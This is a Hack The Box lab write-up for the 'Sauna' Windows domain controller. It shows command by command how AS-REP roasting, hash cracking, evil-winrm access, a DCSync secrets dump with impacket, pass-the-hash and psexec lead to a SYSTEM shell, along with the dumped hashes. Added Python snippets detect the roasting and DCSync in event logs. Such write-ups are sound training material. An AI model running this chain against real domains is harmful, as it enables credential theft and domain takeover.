Sauna HTB writeup
Sauna was my very first Windows box, so don't expect this writeup to be very technical or to show a deep understanding of what's going on. Even so, the box was easy to do.

Recon

The first nmap scan showed the box was an Active Directory domain controller with Kerberos, LDAP and a web site running on port 80.
# Port scan
Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-27 18:03 CEST
Nmap scan report for 10.10.10.175
Host is up (0.068s latency).
Not shown: 65515 filtered ports
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT      STATE SERVICE
53/tcp    open  domain
80/tcp    open  http
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
5985/tcp  open  wsman
9389/tcp  open  adws
49667/tcp open  unknown
49673/tcp open  unknown
49674/tcp open  unknown
49675/tcp open  unknown
49686/tcp open  unknown
64808/tcp open  unknown

Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 184.21 seconds
           Raw packets sent: 196698 (8.655MB) | Rcvd: 2100 (479.390KB)

# Script results
[*] Running NMAP scripts to open ports
Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-27 18:06 CEST
Nmap scan report for 10.10.10.175
Host is up (0.32s latency).

PORT      STATE SERVICE       VERSION
53/tcp    open  domain?
| fingerprint-strings:
|   DNSVersionBindReqTCP:
|     version
|_    bind
80/tcp    open  http          Microsoft IIS httpd 10.0
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Egotistical Bank :: Home
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2020-06-28 00:07:15Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        .NET Message Framing
49667/tcp open  msrpc         Microsoft Windows RPC
49673/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49674/tcp open  msrpc         Microsoft Windows RPC
49675/tcp open  msrpc         Microsoft Windows RPC
49686/tcp open  msrpc         Microsoft Windows RPC
64808/tcp open  msrpc         Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.80%I=7%D=6/27%Time=5EF76E89%P=x86_64-pc-linux-gnu%r(DNSV
SF:ersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\
SF:x04bind\0\0\x10\0\x03");
Service Info: Host: SAUNA; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 8h00m45s
| smb2-security-mode:
|   2.02:
|_    Message signing enabled and required
| smb2-time:
|   date: 2020-06-28T00:09:39
|_  start_date: N/A

FSmith user

Browsing the web site I found a list of employee names at http://10.10.10.175/about.html, so I built a wordlist of possible usernames from them.
$ cat usernames.txt
sauna
HSmith
SKerb
HBear
BTaylor
SDriver
SCoins
FSmith
The next step is to try to get TGTs for any of these users that have 'Do not require Kerberos preauthentication' set in Active Directory (AS-REP roasting with impacket's GetNPUsers.py).
$ python3 /home/xnaaro/git_repos/impacket/examples/GetNPUsers.py EGOTISTICAL-BANK.LOCAL/ -usersfile usernames.txt -format hashcat -o passwords.txt
Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation

[-] User sauna doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User HSmith doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
This gave me a Kerberos 5 AS-REP hash for the FSmith user (the other five names don't exist in the domain, and sauna and HSmith require preauthentication).
$ cat passwords.txt
$krb5asrep$23$FSmith@EGOTISTICAL-BANK.LOCAL:3206b8cb1b99b24d5ddeb489e7159ccf$43b733ba230f2f9a2de8663588d5d335a8928ec26a0d6c061aadb80821b4e322317d7687b0f90bbb8c9c080c0ed9daca9df11bacc6e7db2eb4df5f742194c19a65792edeb948e899fab681fff296d296ab65366cc0cb93c4ab84f058c1--------------------------------------------------------------------------
I cracked the password with hashcat (mode 18200, Kerberos 5 AS-REP etype 23) and the rockyou wordlist.
$ hashcat -m 18200 passwords.txt --wordlist /usr/share/wordlists/rockyou.txt --force -o cracked_pass
hashcat (v5.1.0) starting...


Session..........: hashcat
Status...........: Cracked
Hash.Type........: Kerberos 5 AS-REP etype 23
Hash.Target......: $krb5asrep$23$FSmith@EGOTISTICAL-BANK.LOCAL:bd3af59...b5f83a
Time.Started.....: Mon Jun 29 18:12:54 2020 (32 secs)
Time.Estimated...: Mon Jun 29 18:13:26 2020 (0 secs)
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 331.2 kH/s (12.07ms) @ Accel:8 Loops:1 Thr:64 Vec:1
Recovered........: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts
Progress.........: 10543104/14344385 (73.50%)
Rejected.........: 0/10543104 (0.00%)
Restore.Point....: 10530816/14344385 (73.41%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: Tr1nity -> Teague51

Started: Mon Jun 29 18:12:54 2020
Stopped: Mon Jun 29 18:13:27 2020


$ cat cracked_pass
$krb5asrep$23$FSmith@EGOTISTICAL-BANK.LOCAL:bd3af5934e1a9abfc6cd770402233512$6edde74195ce2e808f1fa664e97ebab69a672a6b12ab0a580906d2c357cc98f986fa71aba2fe85c9ce139b297d234824f82b374f473585a////////////////////////////////:The----------3
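From the defender's side, the two things the GetNPUsers run above leaves behind are accounts with the preauth flag cleared and a burst of Kerberos events on the DC. The following is an added example (not code from the writeup or from impacket) that checks both: a userAccountControl test over constructed LDAP results, and a pass over constructed Security event 4768 records; the source address and the account list are assumptions.

```python
# Added example (not part of the original writeup): defender-side checks for
# the AS-REP roasting step above. All inputs are constructed to mirror what
# GetNPUsers did against the box; field names follow the Windows 4768 schema.
from collections import Counter

UF_DONT_REQUIRE_PREAUTH = 0x400000   # userAccountControl bit GetNPUsers keys on
KDC_ERR_C_PRINCIPAL_UNKNOWN = "0x6"  # 4768 result code for a non-existent user
RC4_HMAC = "0x17"                    # TicketEncryptionType that hashcat 18200 cracks

# Constructed LDAP results: (sAMAccountName, userAccountControl). Only the
# preauth bit matters here; the other bits are typical NORMAL_ACCOUNT values.
LDAP_USERS = [
    ("hsmith", 0x10200),        # NORMAL_ACCOUNT | DONT_EXPIRE_PASSWD
    ("fsmith", 0x410200),       # same, plus DONT_REQ_PREAUTH -> roastable
    ("svc_loanmgr", 0x10200),
]

def no_preauth_accounts(users):
    """Accounts that can be AS-REP roasted: DONT_REQ_PREAUTH set in UAC."""
    return [name for name, uac in users if uac & UF_DONT_REQUIRE_PREAUTH]

# Constructed Security log 4768 (Kerberos TGT requested) events. One TGT was
# issued with PreAuthType 0 and RC4 (the roast); five guessed names failed
# with 0x6 from the same source, as in the GetNPUsers output above.
ATTACKER = "10.10.14.5"   # hypothetical source address
EVENTS_4768 = [
    {"TargetUserName": "FSmith", "IpAddress": ATTACKER, "Status": "0x0",
     "PreAuthType": "0", "TicketEncryptionType": RC4_HMAC},
    {"TargetUserName": "HSmith", "IpAddress": "10.10.14.9", "Status": "0x0",
     "PreAuthType": "2", "TicketEncryptionType": "0x12"},   # normal AES logon
] + [
    {"TargetUserName": u, "IpAddress": ATTACKER, "Status": "0x6",
     "PreAuthType": "-", "TicketEncryptionType": "0xffffffff"}
    for u in ("SKerb", "HBear", "BTaylor", "SDriver", "SCoins")
]

def detect_asrep_roast(events):
    """TGTs issued with no pre-authentication: the AS-REP went out crackable."""
    return [(e["TargetUserName"], e["IpAddress"], e["TicketEncryptionType"])
            for e in events if e["Status"] == "0x0" and e["PreAuthType"] == "0"]

def detect_user_enum(events, threshold=3):
    """Sources with >= threshold unknown-principal failures (name guessing)."""
    hits = Counter(e["IpAddress"] for e in events
                   if e["Status"] == KDC_ERR_C_PRINCIPAL_UNKNOWN)
    return {ip: n for ip, n in hits.items() if n >= threshold}
```

Clearing the preauth flag on whatever the first check returns removes the roast entirely; where an account really needs it, a long random password is the only other protection, since the AS-REP alone is enough for an offline guess.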
As WinRM was enabled on the server (port 5985 in the scan), I could easily connect with evil-winrm using FSmith and the just-cracked credentials.
$ evil-winrm -i 10.10.10.175 -u FSmith -p The-----------3

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\FSmith\Documents> whoami
egotisticalbank\fsmith
*Evil-WinRM* PS C:\Users\FSmith\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\FSmith\Desktop> dir


    Directory: C:\Users\FSmith\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        1/23/2020  10:03 AM             34 user.txt


*Evil-WinRM* PS C:\Users\FSmith\Desktop> type user.txt
1b5520b98d---------------------
The first thing I did was run winPEAS.exe, which found AutoLogon credentials stored in the registry for the svc_loanmgr user (the AutoLogon entry spells the account svc_loanmanager; the domain account it belongs to is svc_loanmgr).
[+] Looking for AutoLogon credentials(T1012)
Some AutoLogon credentials were found!!
DefaultDomainName : EGOTISTICALBANK
DefaultUserName : EGOTISTICALBANK\svc_loanmanager
DefaultPassword : Mo-----------------d!
With this user I can now dump the domain secrets with impacket's secretsdump. The RemoteOperations step fails with access denied, but the DRSUAPI method (a replication request to the DC, i.e. DCSync) still works, so this account holds replication rights on the domain even though it cannot do the remote registry part.
$ impacket-secretsdump EGOTISTICAL-BANK.LOCAL/svc_loanmgr@10.10.10.175

Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation

Password:
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:d9485863-----------------------dff:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:4a8899428cad97676ff802229e466e2c:::
EGOTISTICAL-BANK.LOCAL\HSmith:1103:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd:::
EGOTISTICAL-BANK.LOCAL\FSmith:1105:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd:::
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:1108:aad3b435b51404eeaad3b435b51404ee:9cb31797c39a9b170b04058ba2bba48c:::
SAUNA$:1000:aad3b435b51404eeaad3b435b51404ee:bc8d511e5aba1a9a0dc08dd65886267b:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:987e26bb845e57df4c7301753f6cb53fcf993e1af692d08fd07de74f041bf031
Administrator:aes128-cts-hmac-sha1-96:145e4d0e4a6600b7ec0ece74997651d0
Administrator:des-cbc-md5:19d5f15d689b1ce5
krbtgt:aes256-cts-hmac-sha1-96:83c18194bf8bd3949d4d0d94584b868b9d5f2a54d3d6f3012fe0921585519f24
krbtgt:aes128-cts-hmac-sha1-96:c824894df4c4c621394c079b42032fa9
krbtgt:des-cbc-md5:c170d5dc3edfc1d9
EGOTISTICAL-BANK.LOCAL\HSmith:aes256-cts-hmac-sha1-96:5875ff00ac5e82869de5143417dc51e2a7acefae665f50ed840a112f15963324
EGOTISTICAL-BANK.LOCAL\HSmith:aes128-cts-hmac-sha1-96:909929b037d273e6a8828c362faa59e9
EGOTISTICAL-BANK.LOCAL\HSmith:des-cbc-md5:1c73b99168d3f8c7
EGOTISTICAL-BANK.LOCAL\FSmith:aes256-cts-hmac-sha1-96:8bb69cf20ac8e4dddb4b8065d6d622ec805848922026586878422af67ebd61e2
EGOTISTICAL-BANK.LOCAL\FSmith:aes128-cts-hmac-sha1-96:6c6b07440ed43f8d15e671846d5b843b
EGOTISTICAL-BANK.LOCAL\FSmith:des-cbc-md5:b50e02ab0d85f76b
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:aes256-cts-hmac-sha1-96:6f7fd4e71acd990a534bf98df1cb8be43cb476b00a8b4495e2538cff2efaacba
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:aes128-cts-hmac-sha1-96:8ea32a31a1e22cb272870d79ca6d972c
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:des-cbc-md5:2a896d16c28cf4a2
SAUNA$:aes256-cts-hmac-sha1-96:85aa062ea68e989d52ea603faf0819ef94ab9749ac16385560f7d85a23a1b99a
SAUNA$:aes128-cts-hmac-sha1-96:7c6cc42b0a42c1c1d3e71d4524a265f2
SAUNA$:des-cbc-md5:f438fd4f61136be5
[*] Cleaning up...
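A replication request like the DRSUAPI dump above is audited on the DC as Security event 4662 carrying the DS-Replication-Get-Changes extended-right GUIDs, and legitimate ones come from domain controller machine accounts. The following is an added example (not code from the writeup) that flags such requests from any other account over constructed 4662 records; the trusted DC list and the placeholder GUID in the third event are assumptions.

```python
# Added example (not part of the original writeup): spotting a DCSync-style
# replication request like the DRSUAPI dump above in Security event 4662.
# Events are constructed; field names follow the Windows 4662 schema.
import re

# Extended-right GUIDs a caller needs to pull secrets over DRSUAPI.
DS_REPLICATION_GET_CHANGES = "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"
DS_REPLICATION_GET_CHANGES_ALL = "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"
REPL_GUIDS = {DS_REPLICATION_GET_CHANGES, DS_REPLICATION_GET_CHANGES_ALL}
CONTROL_ACCESS = "0x100"          # AccessMask for an extended-right check
DOMAIN_CONTROLLERS = {"SAUNA$"}   # machine accounts expected to replicate (assumed list)
REPL_PROPS = "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}\n{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"

EVENTS_4662 = [
    # The DC itself replicating: expected, stays quiet.
    {"SubjectUserName": "SAUNA$", "AccessMask": CONTROL_ACCESS, "Properties": REPL_PROPS},
    # A user account asking for the same rights: this is the secretsdump run.
    {"SubjectUserName": "svc_loanmgr", "AccessMask": CONTROL_ACCESS, "Properties": REPL_PROPS},
    # An ordinary attribute read with a placeholder GUID: ignored.
    {"SubjectUserName": "fsmith", "AccessMask": "0x10",
     "Properties": "{00000000-0000-0000-0000-000000000001}"},
]

GUID_RE = re.compile(r"[0-9a-f]{8}(?:-[0-9a-f]{4}){3}-[0-9a-f]{12}")

def dcsync_events(events, trusted=DOMAIN_CONTROLLERS):
    """Return (account, rights) for replication requests by non-DC accounts."""
    hits = []
    for e in events:
        if e.get("AccessMask") != CONTROL_ACCESS:
            continue
        rights = set(GUID_RE.findall(e.get("Properties", "").lower())) & REPL_GUIDS
        if rights and e["SubjectUserName"] not in trusted:
            hits.append((e["SubjectUserName"], sorted(rights)))
    return hits
```

Anything the function returns is worth an alert, and the fix on a box like this one is to take those two rights away from svc_loanmgr.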
I first had some errors about the time not being in sync with the server (the nmap host scripts already showed a clock skew of 8h00m45s, far beyond what Kerberos tolerates), so I synced my local clock with the box.
$ sudo ntpdate 10.10.10.175
30 Jun 04:51:08 ntpdate[19204]: step time server 10.10.10.175 offset +25203.209026 sec
Now I got a Kerberos TGT as the Administrator user using the dumped NTLM hash (getTGT.py's -hashes takes LM:NT, so the LM half is left empty).
$ python3 getTGT.py EGOTISTICAL-BANK.LOCAL/Administrator -hashes :d9485863-------------------ff
Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation

[*] Saving ticket in Administrator.ccache
Set the KRB5CCNAME environment variable to the ticket file so the impacket tools pick it up.
export KRB5CCNAME=/home/xnaaro/git_repos/impacket/examples/Administrator.ccache
Then I added the sauna hostname to /etc/hosts (Kerberos authentication needs the host name, not the IP) and used psexec with the ticket to get a shell on the box.
$ python3 psexec.py EGOTISTICAL-BANK.LOCAL/Administrator@sauna.EGOTISTICAL-BANK.LOCAL -k -no-pass
Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation

[*] Requesting shares on sauna.EGOTISTICAL-BANK.LOCAL.....
[*] Found writable share ADMIN$
[*] Uploading file IIMFVtLs.exe
[*] Opening SVCManager on sauna.EGOTISTICAL-BANK.LOCAL.....
[*] Creating service QMyO on sauna.EGOTISTICAL-BANK.LOCAL.....
[*] Starting service QMyO.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.973]
(c) 2018 Microsoft Corporation. All rights reserved.
I had a SYSTEM shell on the box at this point.
C:\Users\Administrator\Desktop>whoami
nt authority\system

C:\Users\Administrator\Desktop>hostname
SAUNA
C:\Users\Administrator\Desktop>type root.txt
f3ee04965c68257382e31502cc5e881f
This was my first Windows box; I was a bit lost and don't yet fully understand all the steps I did, so I need to learn more about how Kerberos works.
Regards